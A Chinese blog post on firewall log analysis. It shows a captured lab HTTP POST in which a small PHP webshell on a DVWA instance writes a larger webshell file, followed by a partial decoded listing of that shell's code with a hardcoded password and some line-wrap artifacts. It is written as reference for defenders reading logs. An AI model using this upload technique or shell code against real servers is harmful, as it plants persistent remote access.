最近工作内容是分析防火墙日志,看日志是正确,本地实验小马上传大马  抓取http包如下。可以在分析过程中进行借鉴。

该http请求的行为是通过小马,在小马的当前目录创建一个dama.php的文件,文件内容就是大马的里面的代码。

  1. POST /dvwa/xiaoma.php HTTP/1.1
  2. Host: 192.168.1.109
  3. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: en-US,en;q=0.5
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 219930
  9. Referer: http://192.168.1.109/dvwa/xiaoma.php
  10. Cookie: security=impossible; PHPSESSID=bi5luo0u864miqcqffpgdql0i6
  11. Connection: close
  12. Upgrade-Insecure-Requests: 1
  13.  
  14. f=C%3A%2Fphpstudy%2FWWW%2Fdvwa%2Fdama.php&c=%3C%3Fphp%0D%0A%24password+%3D+%22admin%21%40%23%22%3B%2F%2Fchange+password+here%0D%0Aerror_reporting%
    28E_ERROR%29%3B%0D%0Aset_time_limit%280%29%3B%0D%0A%24lanip+%3D+getenv%28%27REMOTE_ADDR%27%29%3B%0D%0A%0D%0Afunction+Root_GP%28%26%24array%29%0D
    %0A%7B%0D%0A%09while%28list%28%24key%2C%24var%29+%3D+each%28%24array%29%29%0D%0A%09%7B%0D%0A%09%09if%28%28strtoupper%28%24key%29+%21%3D+%24key+%7
    C%7C+%27%27.intval%28%24key%29+%3D%3D+%22%24key%22%29+%26%26+%24key+%21%3D+%27argc%27+%26%26+%24key+%21%3D+%27argv%27%29%0D%0A%09%09%7B%0D%0A%
    09%09%09if%28is_string%28%24var%29%29+%24array%5B%24key%5D+%3D+stripslashes%28%24var%29%3B%0D%0A%09%09%09if%28is_array%28%24var%29%29+%24array%5B
    %24key%5D+%3D+Root_GP%28%24var%29%3B++%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%09return+%24array%3B%0D%0A%7D%0D%0A%0D%0Afunction+Root_CSS%28%29%0D%0A%7B
    %0D%0Aprint%3C%3C%3CEND%0D%0A%3Cstyle+type%3D%22text%2Fcss%22%3E%0D%0A%09*%7Bpadding%3A0%3B+margin%3A0%3B%7D%0D%0A%09body%7Bbackground%3Athree
    dface%3Bfont-family%3A%22Verdana%22%2C+%22Tahoma%22%2C+sans-serif%3B+font-size%3A13px%3Bmargin-top%3A3px%3Bmargin-bottom%3A3px%3Btable-layout%
    3Afixed%3Bword-break%3Abreak-all%3B%7D%0D%0A%09a%7Bcolor%3A%23000000%3Btext-decoration%3Anone%3B%7D%0D%0A%09a%3Ahover%7Bbackground%3A%2333FF33
    %3B%7D%0D%0A%09table%7Bcolor%3A%23000000%3Bfont-family%3A%22Verdana%22%2C+%22Tahoma%22%2C+sans-serif%3Bfont-size%3A13px%3Bborder%3A1px+solid+%
    23999999%3B%7D%0D%0A%09td%7Bbackground%3A%23F9F6F4%3B%7D%0D%0A++++++++.bt%7Bbackground%3A%233d3d3d%3Bcolor%3A%23ffffff%3Bborder%3A2px%3Bfont%3A13
    px+Arial%2CTahoma%3Bheight%3A22px%3B%7D%0D%0A%09.toptd%7Bbackground%3Athreedface%3B+width%3A310px%3B+border-color%3A%23FFFFFF+%23999999+%2399999
    9+%23FFFFFF%3B+border-style%3Asolid%3Bborder-width%3A1px%3B%7D%0D%0A%09.msgbox%7Bbackground%3A%23FFFFE0%3Bcolor%3A%23FF0000%3Bheight%3A25px%3Bfo
    nt-size%3A12px%3Bborder%3A1px+solid+%23999999%3Btext-align%3Acenter%3Bpadding%3A3px%3Bclear%3Aboth%3B%7D%0D%0A%09.actall%7Bbackground%3A%23F9F6F
    4%3Bfont-size%3A14px%3Bborder%3A1px+solid+%23999999%3Bpadding%3A2px

POST数据内容

  1. f=C:/phpstudy/WWW/dvwa/dama.php&c=<?php
  2. $password = "admin!@#";//change password here
  3. error_reporting%
  4. 28E_ERROR);
  5. set_time_limit(0);
  6. $lanip = getenv('REMOTE_ADDR');
  7.  
  8. function Root_GP(&$array)
  9.  
  10. {
  11. 	while(list($key,$var) = each($array))
  12. 	{
  13. 		if((strtoupper($key) != $key %7
  14. C| ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
  15. 		{
  16. %
  17. 09		if(is_string($var)) $array[$key] = stripslashes($var);
  18. 			if(is_array($var)) $array[
  19. $key] = Root_GP($var);
  20. 		}
  21. 	}
  22. 	return $array;
  23. }
  24.  
  25. function Root_CSS()
  26. {
  27.  
  28. print<<<END
  29. <style type="text/css">
  30. 	*{padding:0; margin:0;}
  31. 	body{background:three
  32. dface;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout%
  33. 3Afixed;word-break:break-all;}
  34. 	a{color:#000000;text-decoration:none;}
  35. 	a:hover{background:#33FF33
  36. ;}
  37. 	table{color:#000000;font-family:"Verdana", "Tahoma", sans-serif;font-size:13px;border:1px solid %
  38. 23999999;}
  39. 	td{background:#F9F6F4;}
  40.         .bt{background:#3d3d3d;color:#ffffff;border:2px;font:13
  41. px Arial,Tahoma;height:22px;}
  42. 	.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #99999
  43. 9 #FFFFFF; border-style:solid;border-width:1px;}
  44. 	.msgbox{background:#FFFFE0;color:#FF0000;height:25px;fo
  45. nt-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
  46. 	.actall{background:#F9F6F
  47. 4;font-size:14px;border:1px solid #999999;padding:2px

HTTP协议包分析(小马上传大马)的更多相关文章

  1. WireShark——IP协议包分析(Ping分析IP协议包)

    互联网协议 IP 是 Internet Protocol 的缩写,中文缩写为“网协”.IP 协议是位于 OSI 模型中第三层的协议,其主要目的就是使得网络间能够互联通信.前面介绍了 ARP 协议, 该 ...

  2. 01、WireShark——ARP 协议包分析

     1. 什么是ARP ARP(Address Resolution Protocol)协议,即地址解析协议.该协议的功能就是将 IP 地 址解析成 MAC 地址. ARP(Address Resolu ...

  3. WireShark——ARP 协议包分析

     1. 什么是ARP ARP(Address Resolution Protocol)协议,即地址解析协议.该协议的功能就是将 IP 地 址解析成 MAC 地址. ARP(Address Resolu ...

  4. 网络协议抓包分析——TCP传输控制协议(连接建立、释放)

    前言 TCP协议为数据提供可靠的端到端的传输,处理数据的顺序和错误恢复,保证数据能够到达其应到达的地方.TCP协议是面向连接的,在两台主机使用TCP协议进行通信之前,会先建立一个TCP连接(三次握手) ...

  5. 网络协议抓包分析——ARP地址解析协议

    前言 计算机之间可以相互通信的前提是要知道对方的地址,才可以发送信息给其他计算机,就像别人要联系你也得先知道你的电话号码一样.这里的地址因为网络分层的原因就包括IP地址和MAC地址(即网卡地址.硬件地 ...

  6. FTP协议的粗浅学习--利用wireshark抓包分析相关tcp连接

    一.为什么写这个 昨天遇到个ftp相关的问题,关于ftp匿名访问的.花费了大量的脑细胞后,终于搞定了服务端的配置,现在客户端可以像下图一样,直接在浏览器输入url,即可直接访问. 期间不会弹出输入用户 ...

  7. 实战录 | 基于openflow协议的抓包分析

    <实战录>导语 云端卫士<实战录>栏目定期会向粉丝朋友们分享一些在开发运维中的经验和技巧,希望对于关注我们的朋友有所裨益.本期分享人为云端卫士安全SDN工程师宋飞虎,将带来基于 ...

  8. wireshark 抓包分析 TCPIP协议的握手

    wireshark 抓包分析 TCPIP协议的握手 原网址:http://www.cnblogs.com/TankXiao/archive/2012/10/10/2711777.html 之前写过一篇 ...

  9. 网络协议抓包分析——IP互联网协议

    前言 IP协议是位于OSI模型的第三层协议,其主要目的就是使得网络间可以相互通信.在这一层上运行的协议不止IP协议,但是使用最为广泛的就是互联网协议. 什么是IP数据报 TCP/IP协议定义了一个在因 ...

随机推荐

  1. LAMP架构三

    PHP相关配置 1.查找php配置文件/usr/local/php/bin/php -i或者phpinfo() [root@bogon admin]# /usr/local/php/bin/php - ...

  2. 5V转3.3v电路

    方案一: MIC5205-3.3 输出电流150ma 输出电压3.3V 其中:CT24为钽电容: 方案二: AMS1117-3.3 输出电流800ma 输出电压:3.3V 输入电压:4.75~12v

  3. eclipse java MemoryAnalyzer 查询内存泄漏 环境配置

    简单记录下java用MemoryAnalyzer分析内存泄漏问题! 首先,内存不足的时候,会报错 Exception in thread "main" java.lang.OutO ...

  4. HBase学习笔记——配置及Shell操作

    1.HBase的配置 还是以前配置的集群,见:http://www.cnblogs.com/DarrenChan/p/6493373.html 我们约定:weekend03和weekend04放HMa ...

  5. Azkaban安装配置

    描述: azkaban主要用于离线计算任务的调度 说明: 此处Azkaban选择版本为:3.52.0,部署方式为Cluster模式,即支持多Executor计算节点,目前默认安装方式选择在同一台机器上 ...

  6. expr判断整数是相加的值,返回命令的返回值$? 是0,但是少数情况是1,例如1 + -1 ,$? 的结果是1 ,判断要大于1最准确

    [root@m01 ~]# expr 1 + 12[root@m01 ~]# echo $?0[root@m01 ~]# echo 1 - 51 - 5[root@m01 ~]# expr 1 - 5 ...

  7. 玩转Win10的45个快捷键

    1Win10快捷键大全(第一部分) Win10发布已经快两个星期了,各项新功能也让小伙伴们兴奋不已.和之前系统一样,Win10也加入了很多经典的快捷键,同时还加入了全新触控手势.今天小编就将所有的Wi ...

  8. 用Vue.js递归组件构建一个可折叠的树形菜单

    在Vue.js中一个递归组件调用的是其本身,如: Vue.component('recursive-component', {   template: `<!--Invoking myself! ...

  9. ssd算法论文理解

    这篇博客主要是讲下我在阅读ssd论文时对论文的理解,并且自行使用pytorch实现了下论文的内容,并测试可以用. 开篇放下论文地址https://arxiv.org/abs/1512.02325,可以 ...

  10. 【Mac命令行学习】(持续更新)

    常用命令: 一.修改环境变量文件: 1.进入文件:vi .bash_profile 2.键盘点击[a]键,进入文件编辑 3.修改完成后,如果是vi,点击[esc]键退出编辑模式 4.输入以下命令进行具 ...